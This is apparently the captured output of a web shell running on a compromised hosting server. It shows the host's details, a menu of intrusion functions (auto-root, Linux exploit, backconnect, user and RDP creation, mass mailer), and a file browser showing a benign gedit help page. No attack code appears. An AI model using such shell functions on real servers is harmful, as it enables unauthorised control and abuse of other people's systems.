Linux cpanel.rrshost.in 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
Apache
: 109.123.238.221 | : 172.69.17.150
128 Domain
8.2.28
aev999
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
help-langpack /
en_GB /
gedit /
[ HOME SHELL ]
Name
Size
Permission
Action
gedit-change-color-scheme.page
2.54
KB
-rw-r--r--
gedit-change-default-font.page
1.82
KB
-rw-r--r--
gedit-character-encodings.page
3.09
KB
-rw-r--r--
gedit-close-file.page
1.25
KB
-rw-r--r--
gedit-create-new-file.page
1.46
KB
-rw-r--r--
gedit-edit-as-root.page
1.65
KB
-rw-r--r--
gedit-files-basic.page
1.06
KB
-rw-r--r--
gedit-full-screen.page
2.54
KB
-rw-r--r--
gedit-open-files-from-sidepane...
2.44
KB
-rw-r--r--
gedit-open-files.page
2.21
KB
-rw-r--r--
gedit-open-on-server.page
2.34
KB
-rw-r--r--
gedit-open-recent.page
1.67
KB
-rw-r--r--
gedit-plugin-guide.page
1.97
KB
-rw-r--r--
gedit-plugins-change-case.page
2.15
KB
-rw-r--r--
gedit-plugins-doc-stats.page
1.87
KB
-rw-r--r--
gedit-plugins-external-tools.p...
2.01
KB
-rw-r--r--
gedit-plugins-file-browser.pag...
1.93
KB
-rw-r--r--
gedit-plugins-insert-date-time...
2.08
KB
-rw-r--r--
gedit-plugins-install.page
2.78
KB
-rw-r--r--
gedit-plugins-modelines.page
3.54
KB
-rw-r--r--
gedit-plugins-pyconsole.page
1.47
KB
-rw-r--r--
gedit-plugins-quick-open.page
2.84
KB
-rw-r--r--
gedit-plugins-snippets.page
6.5
KB
-rw-r--r--
gedit-plugins-sort.page
2.75
KB
-rw-r--r--
gedit-printing-order.page
2.48
KB
-rw-r--r--
gedit-printing-select.page
1.75
KB
-rw-r--r--
gedit-printing.page
4.03
KB
-rw-r--r--
gedit-quickstart.page
1.66
KB
-rw-r--r--
gedit-replace.page
5.13
KB
-rw-r--r--
gedit-save-file.page
1.56
KB
-rw-r--r--
gedit-search.page
3.93
KB
-rw-r--r--
gedit-spellcheck.page
4.86
KB
-rw-r--r--
gedit-syntax-highlighting.page
1.62
KB
-rw-r--r--
gedit-tab-groups.page
3.32
KB
-rw-r--r--
gedit-tabs-moving.page
3.59
KB
-rw-r--r--
gedit-tabs.page
2.28
KB
-rw-r--r--
gedit-undo-redo.page
1.65
KB
-rw-r--r--
index.page
2
KB
-rw-r--r--
legal.xml
322
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : gedit-plugins-install.page
<?xml version="1.0" encoding="utf-8"?> <page xmlns="http://projectmallard.org/1.0/" type="topic" style="task" id="gedit-plugins-install" xml:lang="gedit-en-GB"> <info> <link type="guide" xref="gedit-plugin-guide#gedit-additional-plugins"/> <revision pkgversion="3.8" date="2013-02-24" status="review"/> <credit type="author"> <name>Jim Campbell</name> <email>jcampbell@gnome.org</email> </credit> <credit type="author"> <name>Daniel Neel</name> <email>dneelyep@gmail.com</email> </credit> <desc>How to install third-party plug-ins.</desc> <mal:credit xmlns:mal="http://projectmallard.org/1.0/" type="translator copyright"> <mal:name>Zander Brown</mal:name> <mal:email>zbrown@gnome.org</mal:email> <mal:years>2020</mal:years> </mal:credit> </info> <title>Additional gedit plug-ins</title> <p>Installing third-party plug-ins gives you extra functionality that isn't available in default <app>gedit</app> plug-ins, or even the extra plug-ins that are part of the <app>gedit-plugins</app> package. An online list of third-party plug-ins is <link href="https://wiki.gnome.org/Apps/Gedit">kept here</link>.</p> <p>Installing a third-party plug-in involves downloading the plug-in, placing the plug-in files in the right directory, and activating the plug-in.</p> <steps> <item><p>You can usually download a plug-in from the plug-in's website, but may need to use a revision-control program like <app>git</app>, <app> bazaar</app>, or <app>subversion</app> to copy a plug-in's software repository from the internet. Refer to the plug-in's documentation for information on getting the plug-in.</p></item> <item><p>Place the plug-in files into the <file>/home/<var>username</var>/.local/share/gedit/plugins</file> directory.</p> <p>Of course, replace the word <var>username</var> with your own username.</p></item> <item><p>After you have placed the plug-in files into the correct directory, the plug-in will appear in the Preferences menu. Press the menu button in the top-right corner of the window and select <guiseq><gui style="menuitem"> Preferences</gui><gui style="tab">Plug-ins</gui><gui>[Name of Plug-in]</gui> </guiseq> to enable the plug-in.</p></item> <item><p>Click <gui>Close</gui>.</p></item> </steps> <p>After you have enabled the plug-in, it should be available for you to use.</p> <note style="tip"> <p>The <file>.local</file> directory is hidden by default. To view it and other hidden files, select <guiseq><gui>View</gui><gui>Show Hidden Files</gui></guiseq>, or press <keyseq><key>Ctrl</key><key>H</key></keyseq>.</p> </note> <note style="tip"> <p>If the directory <file>.local/share/gedit/plugins/</file> is not present on your system, you will need to create it.</p> </note> </page>
Close